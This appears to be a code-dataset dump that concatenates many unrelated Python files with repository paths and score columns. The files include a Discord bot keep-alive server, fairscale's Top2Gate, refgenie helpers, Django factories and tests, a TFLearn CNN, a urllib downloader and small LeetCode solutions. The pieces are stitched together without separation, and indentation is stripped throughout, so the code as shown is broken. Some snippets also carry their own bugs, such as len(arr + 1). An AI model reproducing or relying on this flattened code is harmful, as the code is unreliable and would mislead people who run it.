<a href="https://github.com/psf/black"><img alt="Code style: black" src="https://img.shields.io/badge/code%20style-black-000000.svg?style=flat"></a>
<a href="https://pycqa.github.io/isort/"><img alt="Imports: isort" src="https://img.shields.io/badge/%20imports-isort-%231674b1?style=flat&labelColor=ef8336"></a>
</p>
<hr>
<p>The new version of LinerlyBot with <a href="https://discordpy.readthedocs.io/en/stable">discord.py</a>.</p>
<p><a href="https://discord.com/oauth2/authorize?client_id=529566778293223434&permissions=2147485696&scope=bot+applications.commands"><img src="https://img.shields.io/badge/-Add%20LinerlyBot%20to%20your%20Discord%20server!-1e90ff?style=for-the-badge" alt="Invite LinerlyBot"></a></p>
<hr>
<h1>Features</h1>
<ul>
<li>Informational commands such as the <code>help</code>, <code>info</code>, <code>ping</code>, and the <code>about</code> command.</li>
<li>Fun commands such as the <code>joke</code> and the <code>feeling</code> command.</li>
<li>Other miscellaneous such as the <code>quote</code> command.</li>
<li>Gold as the currency for LinerlyBot.</li>
</ul>
<hr>
</body>
</html>
"""
def run():
app.run(host="0.0.0.0", port=8080)
def keep_alive():
t = Thread(target=run)
t.start()
| 2.53125 | 3 |
fairscale/nn/moe/top2gate.py | vfdev-5/fairscale | 6 | 12796613 | # Copyright (c) Facebook, Inc. and its affiliates. All rights reserved.
#
# This source code is licensed under the BSD license found in the
# LICENSE file in the root directory of this source tree.
# Implementation of Top2Gating described in https://arxiv.org/pdf/2006.16668.pdf
# Code is inspired by Top2GatingOnLogits from lingvo:
# https://github.com/tensorflow/lingvo/blob/21b8106c5f1d30a196c98eedc441d4fd70833b11/lingvo/core/moe_layers.py#L477
from typing import Callable, Dict, Tuple
import torch
from torch import Tensor
import torch.nn.functional as F
gumbel_map: Dict[torch.device, Callable] = {}
def gumbel_rsample(shape: Tuple, device: torch.device) -> Tensor:
gumbel = gumbel_map.get(device)
if gumbel is None:
one = torch.tensor(1.0, device=device)
zero = torch.tensor(0.0, device=device)
gumbel = torch.distributions.gumbel.Gumbel(zero, one).rsample # type: ignore
gumbel_map[device] = gumbel
return gumbel(shape)
def top2gating(logits: torch.Tensor) -> Tuple[Tensor, Tensor, Tensor]:
"""Implements Top2Gating on logits."""
gates = F.softmax(logits, dim=1)
# gates has shape of SE
num_tokens = gates.shape[0]
num_experts = gates.shape[1]
# capacity = 2S/E
capacity = 2 * num_tokens // num_experts
assert num_tokens % num_experts == 0
# Create a mask for 1st's expert per token
indices1_s = torch.argmax(gates, dim=1)
mask1 = F.one_hot(indices1_s, num_classes=num_experts)
# Create a mask for 2nd's expert per token using Gumbel-max trick
# https://timvieira.github.io/blog/post/2014/07/31/gumbel-max-trick/
logits_w_noise = logits + gumbel_rsample(logits.shape, device=logits.device)
# Replace top-expert with min value
logits_except1 = logits_w_noise.masked_fill(mask1.bool(), float("-inf"))
indices2_s = torch.argmax(logits_except1, dim=1)
mask2 = F.one_hot(indices2_s, num_classes=num_experts)
# Compute locations in capacity buffer
locations1 = torch.cumsum(mask1, dim=0) - 1
locations2 = torch.cumsum(mask2, dim=0) - 1
# Update 2nd's location by accounting for locations of 1st
locations2 += torch.sum(mask1, dim=0, keepdim=True)
# Compute l_aux
me = torch.mean(gates, dim=0)
ce = torch.mean(mask1.float(), dim=0)
l_aux = torch.mean(me * ce)
# Remove locations outside capacity from mask
mask1 *= torch.lt(locations1, capacity)
mask2 *= torch.lt(locations2, capacity)
# Store the capacity location for each token
locations1_s = torch.sum(locations1 * mask1, dim=1)
locations2_s = torch.sum(locations2 * mask2, dim=1)
# Normalize gate probabilities
mask1_float = mask1.float()
mask2_float = mask2.float()
gates1_s = torch.einsum("se,se->s", gates, mask1_float)
gates2_s = torch.einsum("se,se->s", gates, mask2_float)
denom_s = gates1_s + gates2_s
# Avoid divide-by-zero
denom_s = torch.clamp(denom_s, min=torch.finfo(denom_s.dtype).eps)
gates1_s /= denom_s
gates2_s /= denom_s
# Calculate combine_weights and dispatch_mask
gates1 = torch.einsum("s,se->se", gates1_s, mask1_float)
gates2 = torch.einsum("s,se->se", gates2_s, mask2_float)
locations1_sc = F.one_hot(locations1_s, num_classes=capacity)
locations2_sc = F.one_hot(locations2_s, num_classes=capacity)
combine1_sec = torch.einsum("se,sc->sec", gates1, locations1_sc)
combine2_sec = torch.einsum("se,sc->sec", gates2, locations2_sc)
combine_weights = combine1_sec + combine2_sec
dispatch_mask = combine_weights.bool()
return l_aux, combine_weights, dispatch_mask
class Top2Gate(torch.nn.Module):
"""Gate module which implements Top2Gating as described in Gshard_.
::
gate = Top2Gate(model_dim, num_experts)
l_aux, combine_weights, dispatch_mask = gate(input)
.. Gshard_: https://arxiv.org/pdf/2006.16668.pdf
Args:
model_dim (int):
size of model embedding dimension
num_experts (ints):
number of experts in model
"""
wg: torch.nn.Linear
def __init__(self, model_dim: int, num_experts: int,) -> None:
super().__init__()
self.wg = torch.nn.Linear(model_dim, num_experts, bias=False)
def forward(self, input: torch.Tensor) -> Tuple[Tensor, Tensor, Tensor]: # type: ignore
logits = self.wg(input)
return top2gating(logits)
| 2.40625 | 2 |
refgenie/helpers.py | lmfaber-dkfz/refgenie | 32 | 12796614 | import errno
import os
from refgenconf import MissingRecipeError
from ubiquerg import is_writable
from .asset_build_packages import asset_build_packages
from .exceptions import MissingFolderError
def _parse_user_build_input(input):
"""
Parse user input specification. Used in build for specific parents and input parsing.
:param Iterable[Iterable[str], ...] input: user command line input,
formatted as follows: [[fasta=txt, test=txt], ...]
:return dict: mapping of keys, which are input names and values
"""
lst = []
for i in input or []:
lst.extend(i)
return (
{x.split("=")[0]: x.split("=")[1] for x in lst if "=" in x}
if lst is not None
else lst
)
def _single_folder_writeable(d):
return os.access(d, os.W_OK) and os.access(d, os.X_OK)
def _writeable(outdir, strict_exists=False):
outdir = outdir or "."
if os.path.exists(outdir):
return _single_folder_writeable(outdir)
elif strict_exists:
raise MissingFolderError(outdir)
return _writeable(os.path.dirname(outdir), strict_exists)
def _raise_missing_recipe_error(recipe):
"""
Raise an error for a missing recipe, when one is requested
:param str recipe: recipe name
:raise MissingRecipeError: always
"""
raise MissingRecipeError(
f"Recipe '{recipe}' not found. Available recipes: "
f"{', '.join(list(asset_build_packages.keys()))}"
)
def _skip_lock(skip_arg, cfg):
"""
If config read lock skip was not forced, check if dir is writable and set
the default to the result
:param bool skip_arg: argument selected on the CLI
:param str cfg: path to the confjg
:return bool: decision -- whether to skip the file lock for read
"""
return is_writable(os.path.dirname(cfg)) if not skip_arg else True
def make_sure_path_exists(path):
"""
Creates all directories in a path if it does not exist.
:param str path: Path to create.
:raises Exception: if the path creation attempt hits an error with
a code indicating a cause other than pre-existence.
"""
try:
os.makedirs(path)
except OSError as exception:
if exception.errno != errno.EEXIST:
raise
| 2.5 | 2 |
clarisse/var/lib/linux/menus/main_menu/file/open_recent_clear_recent.py | GuillaumeVFX/pipel | 2 | 12796615 | ix.application.clear_recent_files("project") | 1.023438 | 1 |
example_project/example_project/urls.py | pwilczynskiclearcode/django-nuit | 5 | 12796616 | from django.conf.urls import patterns, include, url
urlpatterns = patterns('',
url(r'^', include('demo.urls')),
url(r'^login/$', 'django.contrib.auth.views.login', {'template_name': 'nuit/generic/login.html'}),
url(r'^logout/$', 'django.contrib.auth.views.logout'),
)
| 1.734375 | 2 |
scripts/sensitivity_analysis/iceswe.py | gavento/epimod | 26 | 12796617 | """
:code:`iceswe.py`
Holdout both iceland and sweden
"""
import pymc3 as pm
from epimodel import EpidemiologicalParameters
from epimodel.preprocessing.data_preprocessor import preprocess_data
import argparse
import pickle
from scripts.sensitivity_analysis.utils import *
import os
os.environ['OMP_NUM_THREADS'] = '1'
os.environ['MKL_NUM_THREADS'] = '1'
os.environ['OPENBLAS_NUM_THREADS'] = '1'
argparser = argparse.ArgumentParser()
add_argparse_arguments(argparser)
if __name__ == '__main__':
args, extras = argparser.parse_known_args()
data = preprocess_data(get_data_path(), last_day='2020-05-30')
data.mask_reopenings()
if 'deaths_only' in args.model_type:
data.remove_regions_min_deaths(5)
data.mask_region('IS')
data.mask_region('SE')
ep = EpidemiologicalParameters()
model_class = get_model_class_from_str(args.model_type)
bd = {**ep.get_model_build_dict(), **parse_extra_model_args(extras)}
pprint_mb_dict(bd)
with model_class(data) as model:
model.build_model(**bd)
ta = get_target_accept_from_model_str(args.model_type)
with model.model:
model.trace = pm.sample(args.n_samples, tune=500, chains=args.n_chains, cores=args.n_chains, max_treedepth=14,
target_accept=ta, init='adapt_diag')
save_cm_trace(f'iceswe.txt', model.trace.CMReduction, args.exp_tag,
generate_base_output_dir(args.model_type, parse_extra_model_args(extras)))
if model.country_specific_effects:
nS, nCMs = model.trace.CMReduction.shape
full_trace = np.exp(
np.log(model.trace.CMReduction) + np.random.normal(size=(nS, nCMs)) * model.trace.CMAlphaScales)
save_cm_trace('iceswe-cs.txt', full_trace, args.exp_tag,
generate_base_output_dir(args.model_type, parse_extra_model_args(extras)))
| 2.125 | 2 |
django/privat_gos_sait/about_company/templatetags/test_teg.py | Netromnik/python | 0 | 12796618 | <reponame>Netromnik/python
from django import template
register = template.Library()
@register.filter('modF')
def modF(value, arg):
print (not (int( value)%int(arg)))
return not (int( value)%int(arg)) | 2.46875 | 2 |
small_number.py | ambivert143/PythonProgram | 0 | 12796619 | <filename>small_number.py
class Small_Number:
def __init__(self, list):
self.list = list
def sma(self):
for x in range(len(self.list)):
for y in range(len(self.list)):
if self.list[x] > self.list[y]:
self.list[x], self.list[y] = self.list[y], self.list[x]
print(self.list[-2])
s1 = Small_Number([1,2,-8,-2,0,-2])
s1.sma() | 3.609375 | 4 |
coding_interviews/leetcode/medium/reduce_array_size_to_the_half/reduce_array_size_to_the_half.py | LeandroTk/Algorithms | 205 | 12796620 | <reponame>LeandroTk/Algorithms<filename>coding_interviews/leetcode/medium/reduce_array_size_to_the_half/reduce_array_size_to_the_half.py
# https://leetcode.com/problems/reduce-array-size-to-the-half
'''
Time Complexity: O(NlogN)
Space Complexity: O(N)
'''
def min_set_size(arr):
num_to_count, counts, min_size, current_length = {}, [], 0, len(arr)
for num in arr:
if num in num_to_count:
num_to_count[num] += 1
else:
num_to_count[num] = 1
for num in num_to_count:
counts.append(num_to_count[num])
counts = reversed(sorted(counts))
if len(arr) % 2 == 0:
cut = len(arr) / 2
else:
cut = len(arr + 1) / 2
for count in counts:
min_size += 1
current_length -= count
if current_length <= cut:
return min_size
return min_size
| 3.890625 | 4 |
configs/nas_fcos/ranksort_nas_fcos_r50_caffe_fpn_1x_coco_lr0010.py | yinchimaoliang/ranksortloss | 210 | 12796621 | _base_ = 'ranksort_nas_fcos_r50_caffe_fpn_1x_coco.py'
optimizer = dict(lr=0.010)
| 0.941406 | 1 |
app/tests/courses/factories.py | Valaraucoo/raven | 3 | 12796622 | import datetime
import random
import factory
import factory.fuzzy as fuzzy
from django.core.files.base import ContentFile
from courses import models
from courses.models import LANGUAGE_CHOICES, PROFILE_CHOICES
from tests.users import factories as users_factories
from users import models as users_models
PROFILE_CHOICES = [x[0] for x in PROFILE_CHOICES]
LANGUAGE_CHOICES = [x[0] for x in LANGUAGE_CHOICES]
class GradeFactory(factory.django.DjangoModelFactory):
class Meta:
model = models.Grade
name = factory.Sequence(lambda n: "Grade %03d" % n)
start_year = factory.Faker('date_object')
supervisor = factory.SubFactory(users_factories.StudentFactory)
profile = fuzzy.FuzzyChoice(PROFILE_CHOICES)
@factory.post_generation
def students(self, create, extracted, **kwargs):
if not create:
return
if extracted:
for student in extracted:
self.students.add(student)
else:
random_students = random.choices(users_models.Student.objects.all(), k=10)
for student in random_students:
self.students.add(student)
class CourseFactory(factory.django.DjangoModelFactory):
class Meta:
model = models.Course
name = factory.Sequence(lambda n: "Course %02d" % n)
description = factory.Faker('text')
head_teacher = factory.SubFactory(users_factories.TeacherFactory)
grade = factory.SubFactory(GradeFactory)
code_meu = '123'
has_exam = False
semester = fuzzy.FuzzyChoice([i for i in range(1, 8)])
language = fuzzy.FuzzyChoice(LANGUAGE_CHOICES)
lecture_hours = fuzzy.FuzzyChoice([i for i in range(1, 40)])
labs_hours = fuzzy.FuzzyChoice([i for i in range(1, 40)])
@factory.post_generation
def teachers(self, create, extracted, **kwargs):
if not create:
return
if extracted:
for teacher in extracted:
self.teachers.add(teacher)
else:
random_teachers = random.choices(users_models.Teacher.objects.all(), k=5)
for teacher in random_teachers:
self.teachers.add(teacher)
class LectureFactory(factory.django.DjangoModelFactory):
class Meta:
model = models.Lecture
course = factory.SubFactory(CourseFactory)
title = fuzzy.FuzzyText(length=16)
description = factory.Faker('text')
date = fuzzy.FuzzyDate(
start_date=datetime.date.today() - datetime.timedelta(days=100),
end_date=datetime.date.today() + datetime.timedelta(days=100),
)
class GroupFactory(factory.django.DjangoModelFactory):
class Meta:
model = models.CourseGroup
name = fuzzy.FuzzyText(length=16)
@factory.post_generation
def students(self, create, extracted, **kwargs):
if not create:
return
if extracted:
for student in extracted:
self.students.add(student)
class LabFactory(factory.django.DjangoModelFactory):
class Meta:
model = models.Laboratory
course = factory.SubFactory(CourseFactory)
group = factory.SubFactory(GroupFactory)
title = fuzzy.FuzzyText(length=16)
description = factory.Faker('text')
date = fuzzy.FuzzyDate(
start_date=datetime.date.today() - datetime.timedelta(days=100),
end_date=datetime.date.today() + datetime.timedelta(days=100),
)
class CourseGroupFactory(factory.django.DjangoModelFactory):
class Meta:
model = models.CourseGroup
course = factory.SubFactory(CourseFactory)
name = fuzzy.FuzzyText(length=16)
class CourseMarkFactory(factory.django.DjangoModelFactory):
class Meta:
model = models.CourseMark
mark = 65
date = fuzzy.FuzzyDate(datetime.date.today())
description = factory.Faker('text')
course = factory.SubFactory(CourseFactory)
student = factory.SubFactory(users_factories.StudentFactory)
teacher = factory.SubFactory(users_factories.TeacherFactory)
class FinalCourseMarkFactory(factory.django.DjangoModelFactory):
class Meta:
model = models.FinalCourseMark
mark = 5
date = fuzzy.FuzzyDate(datetime.date.today())
description = factory.Faker('text')
course = factory.SubFactory(CourseFactory)
student = factory.SubFactory(users_factories.StudentFactory)
teacher = factory.SubFactory(users_factories.TeacherFactory)
class NoticeFactory(factory.django.DjangoModelFactory):
class Meta:
model = models.CourseNotice
course = factory.SubFactory(CourseFactory)
sender = factory.SubFactory(users_factories.TeacherFactory)
title = fuzzy.FuzzyText(length=16)
content = factory.Faker('text')
created_at = fuzzy.FuzzyDate(datetime.date.today())
class AssignmentFactory(factory.django.DjangoModelFactory):
class Meta:
model = models.Assignment
laboratory = factory.SubFactory(LabFactory)
teacher = factory.SubFactory(users_factories.TeacherFactory)
deadline = fuzzy.FuzzyDate(datetime.date.today())
title = fuzzy.FuzzyText(length=16)
content = factory.Faker('text')
class CourseFileFactory(factory.django.DjangoModelFactory):
class Meta:
model = models.CourseFile
name = fuzzy.FuzzyText(length=16)
description = factory.Faker('text')
file = factory.LazyAttribute(
lambda _: ContentFile(
factory.django.ImageField()._make_data(
{'width': 600, 'height': 600}
), 'example.jpg'
)
)
created_at = fuzzy.FuzzyDate(datetime.date.today())
updated_at = fuzzy.FuzzyDate(datetime.date.today()) | 2.390625 | 2 |
geotrek/common/tests/__init__.py | ker2x/Geotrek-admin | 0 | 12796623 | <filename>geotrek/common/tests/__init__.py<gh_stars>0
# -*- encoding: utf-8 -*-
from django.utils import translation
from django.utils.translation import ugettext as _
# Workaround https://code.djangoproject.com/ticket/22865
from geotrek.common.models import FileType # NOQA
from mapentity.tests import MapEntityTest
from geotrek.authent.factories import StructureFactory
from geotrek.authent.tests import AuthentFixturesTest
class TranslationResetMixin(object):
def setUp(self):
translation.deactivate()
super(TranslationResetMixin, self).setUp()
class CommonTest(AuthentFixturesTest, TranslationResetMixin, MapEntityTest):
api_prefix = '/api/en/'
def get_bad_data(self):
return {'topology': 'doh!'}, _(u'Topology is not valid.')
def test_structure_is_set(self):
if not hasattr(self.model, 'structure'):
return
self.login()
response = self.client.post(self._get_add_url(), self.get_good_data())
self.assertEqual(response.status_code, 302)
obj = self.model.objects.last()
self.assertEqual(obj.structure, self.user.profile.structure)
def test_structure_is_not_changed(self):
if not hasattr(self.model, 'structure'):
return
self.login()
structure = StructureFactory()
self.assertNotEqual(structure, self.user.profile.structure)
obj = self.modelfactory.create(structure=structure)
self.client.post(obj.get_update_url(), self.get_good_data())
self.assertEqual(obj.structure, structure)
| 2 | 2 |
yepes/fields/char.py | samuelmaudo/yepes | 0 | 12796624 | <reponame>samuelmaudo/yepes
# -*- coding:utf-8 -*-
from __future__ import unicode_literals
from django.core import checks
from django.core.validators import MinLengthValidator
from django.db import models
from django.utils import six
from django.utils.encoding import force_text
from django.utils.translation import ugettext_lazy as _
from yepes import forms
from yepes.fields.calculated import CalculatedField
from yepes.utils import unidecode
from yepes.utils.deconstruct import clean_keywords
from yepes.validators import CharSetValidator
def check_max_length_attribute(self, **kwargs):
if (self.max_length is not None
and (not isinstance(self.max_length, six.integer_types)
or self.max_length <= 0)):
return [
checks.Error(
"'max_length' must be None or a positive integer.",
hint=None,
obj=self,
id='yepes.E111',
)
]
else:
return []
def check_min_length_attribute(self, **kwargs):
if self.min_length is None:
return []
elif (not isinstance(self.min_length, six.integer_types)
or self.min_length <= 0):
return [
checks.Error(
"'min_length' must be None or a positive integer.",
hint=None,
obj=self,
id='yepes.E112',
)
]
elif (isinstance(self.max_length, six.integer_types)
and self.max_length < self.min_length):
return [
checks.Error(
"'min_length' cannot be greater than 'max_length'.",
hint="Decrease 'min_length' or increase 'max_length'.",
obj=self,
id='yepes.E113',
)
]
else:
return []
class CharField(CalculatedField, models.CharField):
description = _('String')
def __init__(self, *args, **kwargs):
self.charset = kwargs.pop('charset', None)
self.force_ascii = kwargs.pop('force_ascii', False)
self.force_lower = kwargs.pop('force_lower', False)
self.force_upper = kwargs.pop('force_upper', False)
self.min_length = kwargs.pop('min_length', None)
self.normalize_spaces = kwargs.pop('normalize_spaces', True)
self.trim_spaces = kwargs.pop('trim_spaces', False)
super(CharField, self).__init__(*args, **kwargs)
if self.min_length is not None:
self.validators.append(MinLengthValidator(self.min_length))
if self.charset is not None:
self.validators.append(CharSetValidator(self.charset))
def check(self, **kwargs):
errors = super(CharField, self).check(**kwargs)
errors.extend(self._check_min_length_attribute(**kwargs))
return errors
_check_min_length_attribute = check_min_length_attribute
def deconstruct(self):
name, path, args, kwargs = super(CharField, self).deconstruct()
path = path.replace('yepes.fields.char', 'yepes.fields')
clean_keywords(self, kwargs, variables={
'charset': None,
'force_ascii': False,
'force_lower': False,
'force_upper': False,
'min_length': None,
'normalize_spaces': True,
'trim_spaces': False,
})
return (name, path, args, kwargs)
def formfield(self, **kwargs):
params = {
'form_class': forms.CharField,
'charset': self.charset,
'force_ascii': self.force_ascii,
'force_lower': self.force_lower,
'force_upper': self.force_upper,
'max_length': self.max_length,
'min_length': self.min_length,
'normalize_spaces': self.normalize_spaces,
'trim_spaces': self.trim_spaces,
}
params.update(kwargs)
return super(CharField, self).formfield(**params)
def to_python(self, value):
if value is None:
return value
if not isinstance(value, six.string_types):
value = force_text(value)
if self.normalize_spaces:
value = ' '.join(value.split())
elif self.trim_spaces:
value = value.strip()
if not value:
return value
if self.force_ascii:
value = unidecode(value)
if self.force_lower:
value = value.lower()
elif self.force_upper:
value = value.upper()
return value
| 2.15625 | 2 |
tests/test_utility.py | jrepp/redis-bus | 0 | 12796625 | from redisbus.utility import DictObj
def test_dictobj():
subject_dict = {
"foo": "bar",
"left": "right"
}
subject_obj = DictObj(subject_dict)
assert hasattr(subject_obj, 'foo')
assert hasattr(subject_obj, 'left')
assert subject_obj.foo == "bar"
assert subject_obj.left == "right"
| 2.75 | 3 |
examples/ModelMocks.py | pedro19v/GIMME | 0 | 12796626 | <reponame>pedro19v/GIMME<filename>examples/ModelMocks.py<gh_stars>0
from GIMMECore import TaskModelBridge
from GIMMECore import PlayerModelBridge
class PlayerModelMock(object):
def __init__(self, id, name, currState, pastModelIncreasesGrid, currModelIncreases, preferencesEst, realPreferences):
self.currState = currState
self.id = id
self.name = name
self.pastModelIncreasesGrid = pastModelIncreasesGrid
# self.preferencesEst = preferencesEst.normalized()
# self.realPreferences = realPreferences.normalized()
self.baseLearningRate = None
class TaskModelMock(object):
def __init__(self, id, description, minRequiredAbility, profile, minDuration, difficultyWeight, profileWeight):
self.id = id
self.description = description
self.minRequiredAbility = minRequiredAbility
self.profile = profile
self.difficultyWeight = difficultyWeight
self.profileWeight = profileWeight
self.minDuration = minDuration
class CustomTaskModelBridge(TaskModelBridge):
def __init__(self, tasks):
self.tasks = tasks
self.numTasks = len(tasks)
def registerNewTask(self, taskId, description, minRequiredAbility, profile, minDuration, difficultyWeight, profileWeight):
self.tasks[taskId] = TaskModelMock(taskId, description, minRequiredAbility, profile, minDuration, difficultyWeight, profileWeight)
def getAllTaskIds(self):
return [int(i) for i in range(self.numTasks)]
def getTaskInteractionsProfile(self, taskId):
return self.tasks[taskId].profile
def getMinTaskRequiredAbility(self, taskId):
return self.tasks[taskId].minRequiredAbility
def getMinTaskDuration(self, taskId):
return self.tasks[taskId].minDuration
def getTaskDifficultyWeight(self, taskId):
return self.tasks[taskId].difficultyWeight
def getTaskProfileWeight(self, taskId):
return self.tasks[taskId].profileWeight
def getTaskInitDate(self, taskId):
return self.tasks[taskId].initDate
def getTaskFinalDate(self, taskId):
return self.tasks[taskId].finalDate
class CustomPlayerModelBridge(PlayerModelBridge):
def __init__(self, players):
self.players = players
self.numPlayers = len(players)
def registerNewPlayer(self, playerId, name, currState, pastModelIncreasesGrid, currModelIncreases, preferencesEst, realPreferences):
self.players[int(playerId)] = PlayerModelMock(playerId, name, currState, pastModelIncreasesGrid, currModelIncreases, preferencesEst, realPreferences)
def resetPlayer(self, playerId):
self.players[int(playerId)].currState.reset()
self.players[int(playerId)].pastModelIncreasesGrid.reset()
def resetState(self, playerId):
self.players[int(playerId)].currState.reset()
def setAndSavePlayerStateToGrid(self, playerId, increases, newState):
self.players[int(playerId)].currState = newState
self.players[int(playerId)].pastModelIncreasesGrid.pushToDataFrame(increases)
def setBaseLearningRate(self, playerId, blr):
self.players[int(playerId)].baseLearningRate = blr
def getBaseLearningRate(self, playerId):
return self.players[int(playerId)].baseLearningRate
def getAllPlayerIds(self):
return [int(i) for i in range(self.numPlayers)]
def getPlayerName(self, playerId):
return self.players[int(playerId)].name
def getPlayerCurrState(self, playerId):
return self.players[int(playerId)].currState
def getPlayerCurrProfile(self, playerId):
return self.players[int(playerId)].currState.profile
def getPlayerStatesDataFrame(self, playerId):
return self.players[int(playerId)].pastModelIncreasesGrid
def getPlayerCurrCharacteristics(self, playerId):
return self.players[int(playerId)].currState.characteristics
def getPlayerPreferencesEst(self, playerId):
return self.players[int(playerId)].preferencesEst
def setPlayerPreferencesEst(self, playerId, preferencesEst):
self.players[int(playerId)].preferencesEst = preferencesEst
def setPlayerCharacteristics(self, playerId, characteristics):
self.players[int(playerId)].currState.characteristics = characteristics
def setPlayerProfile(self, playerId, profile):
self.players[int(playerId)].currState.profile = profile
def setPlayerGroup(self, playerId, group):
self.players[int(playerId)].currState.group = group
def setPlayerTasks(self, playerId, tasks):
self.players[int(playerId)].currState.tasks = tasks
def setPlayerRealPreferences(self, playerId, realPreferences):
self.players[int(playerId)].realPreferences = realPreferences
def getPlayerRealPreferences(self, playerId):
return self.players[int(playerId)].realPreferences | 2.53125 | 3 |
src/conv_net.py | chatdip98/Acoustic-Scene-Classification | 0 | 12796627 | <reponame>chatdip98/Acoustic-Scene-Classification
#----convolutional neural network for classification------
#importing required libraries and modules
import os
import numpy as np
import tensorflow as tf
import tflearn
from tflearn.layers.conv import conv_2d, max_pool_2d
from tflearn.layers.core import input_data, dropout, fully_connected
from tflearn.layers.estimator import regression
class CNN():
datasize = 'full'
def __init__(self): #constructor
pass
def create_1ConvModel(self):
#creating the CNN model as per the architecture followed with 4-conv and pooling layers
self.convnet = input_data(shape=[None, 128, 431, 1], name='input')
self.convnet = conv_2d(self.convnet, 32, 5, activation='relu')
self.convnet = max_pool_2d(self.convnet, 3)
self.convnet = conv_2d(self.convnet, 64, 5, activation='relu')
self.convnet = max_pool_2d(self.convnet, 3)
self.convnet = conv_2d(self.convnet, 128, 5, activation='relu')
self.convnet = max_pool_2d(self.convnet, 3)
self.convnet = conv_2d(self.convnet, 256, 5, activation='relu')
self.convnet = max_pool_2d(self.convnet, 3)
self.convnet = tflearn.layers.conv.global_avg_pool(self.convnet)
self.convnet = fully_connected(self.convnet, 1024, activation='relu')
#self.convnet = dropout(self.convnet, 0.8) can be used to avoid overfitting
self.convnet = fully_connected(self.convnet, 15, activation='softmax')
self.convnet = regression(self.convnet, optimizer='adam', learning_rate=0.01,
loss='categorical_crossentropy', name='targets')
self.model = tflearn.DNN(self.convnet)
return self.model
def train_1ConvModel(self, arg, model, X_train, Y_train, X_val, Y_val):
#training the created model with data from the user
#here stochastic learning is deployed since the input data is not too high; minibatch_size=1
self.epoch = 10 #set the number of epochs
model.fit({'input' : X_train}, {'targets' : Y_train}, n_epoch=self.epoch,
validation_set=({'input' : X_val}, {'targets' : Y_val}),
show_metric=True, run_id='DCNet')
model.save('DNN/'+CNN.data_size+'/'+arg+'.model') #saving the model in the DNN/full folder, 3 files will be created for each model
return model
def predict_test_data(self, arg, model, X_test, Y_test):
self.ans = []
count = 0
for i in range(len(X_test)):
self.pr = model.predict([X_test[i]])[0]
self.ans.append(self.pr)
if(np.array_equal((np.round(self.pr)).astype(int), Y_test[i])):
count+=1
print(arg, "Test Accuracy = ", (count/len(X_test))*100, "%") #calculating test accuracy for each classifier
#saving the softmax outputs for using them later for calculating the ensemble accuracy
np.save('test_prediction/full/'+arg+'.npy', np.array(self.ans)) | 3.109375 | 3 |
previous code/lea_1.py | hyywestwood/Spider-of-Water-data | 2 | 12796628 | # -*- coding: utf-8 -*-
# @Time : 2019/4/22 14:57
# @Author : hyy
# @Email : <EMAIL>
# @File : lea_1.py
# @Software: PyCharm
import urllib.request
def download(url, num_retries = 2):
print('Downloading:',url)
headers = {'User-agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0'}
request = urllib.request.Request(url, headers=headers)
try:
html = urllib.request.urlopen(request).read()
except urllib.request.URLError as e:
print('Download error:', e.reason)
html = None
if num_retries > 0:
if hasattr(e, 'code') and 500 <= e.code < 600:
return download(url, num_retries-1)
return html
if __name__ == '__main__':
html = download('http://httpstat.us/500') | 3.265625 | 3 |
kale/tests/unit_tests/test_jupyter_utils.py | klolos/kale | 0 | 12796629 | # Copyright 2020 The Kale Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import json
import pytest
from testfixtures import mock
from kale.utils import jupyter_utils as ju
def _output_display(data):
# `data` must be a list
return [{'output_type': 'display_data', 'data': data}]
@pytest.mark.parametrize("outputs,target", [
([], ""),
# ---
(_output_display({'image/png': "bytes"}),
ju.image_html_template.format("", "bytes")),
# ---
(_output_display({'text/html': "bytes"}), "bytes"),
# ---
(_output_display({'text/plain': "bytes"}),
ju.text_html_template.format("bytes")),
# ---
(_output_display({'application/javascript': "bytes"}),
ju.javascript_html_template.format("bytes")),
])
def test_generate_html_output(outputs, target):
"""Tests html artifact generation from cell outputs."""
assert target == ju.generate_html_output(outputs)
@mock.patch('kale.utils.jupyter_utils.pod_utils')
def test_update_uimetadata_not_exists(pod_utils, tmpdir):
"""Test the uimetadata file is created when it does not exists."""
pod_utils.get_pod_name.return_value = 'test_pod'
pod_utils.get_namespace.return_value = 'test_ns'
pod_utils.get_workflow_name.return_value = 'test_wk'
filepath = os.path.join(tmpdir, 'tmp_uimetadata.json')
# update tmp file
ju.update_uimetadata('test', uimetadata_path=filepath)
# check file has been updated correctly
updated = json.loads(open(filepath).read())
target = {"outputs": [{
'type': 'web-app',
'storage': 'minio',
'source': 'minio://mlpipeline/artifacts/test_wk/test_pod/test.tgz'
}]}
assert updated == target
@mock.patch('kale.utils.jupyter_utils.pod_utils')
def test_update_uimetadata_from_empty(pod_utils, tmpdir):
"""Test that the uimetadata file is updated inplace correctly."""
pod_utils.get_pod_name.return_value = 'test_pod'
pod_utils.get_namespace.return_value = 'test_ns'
pod_utils.get_workflow_name.return_value = 'test_wk'
# create base tmp file
base = {"outputs": []}
filepath = os.path.join(tmpdir, 'tmp_uimetadata.json')
json.dump(base, open(filepath, 'w'))
# update tmp file
ju.update_uimetadata('test', uimetadata_path=filepath)
# check file has been updated correctly
updated = json.loads(open(filepath).read())
target = {"outputs": [{
'type': 'web-app',
'storage': 'minio',
'source': 'minio://mlpipeline/artifacts/test_wk/test_pod/test.tgz'
}]}
assert updated == target
@mock.patch('kale.utils.jupyter_utils.pod_utils')
def test_update_uimetadata_from_not_empty(pod_utils, tmpdir):
"""Test that the uimetadata file is updated inplace correctly."""
pod_utils.get_pod_name.return_value = 'test_pod'
pod_utils.get_namespace.return_value = 'test_ns'
pod_utils.get_workflow_name.return_value = 'test_wk'
# create base tmp file
markdown = {
'type': 'markdown',
'storage': 'inline',
'source': '#Some markdown'
}
base = {"outputs": [markdown]}
filepath = os.path.join(tmpdir, 'tmp_uimetadata.json')
json.dump(base, open(filepath, 'w'))
# update tmp file
ju.update_uimetadata('test', uimetadata_path=filepath)
# check file has been updated correctly
updated = json.loads(open(filepath).read())
target = {"outputs": [markdown, {
'type': 'web-app',
'storage': 'minio',
'source': 'minio://mlpipeline/artifacts/test_wk/test_pod/test.tgz'
}]}
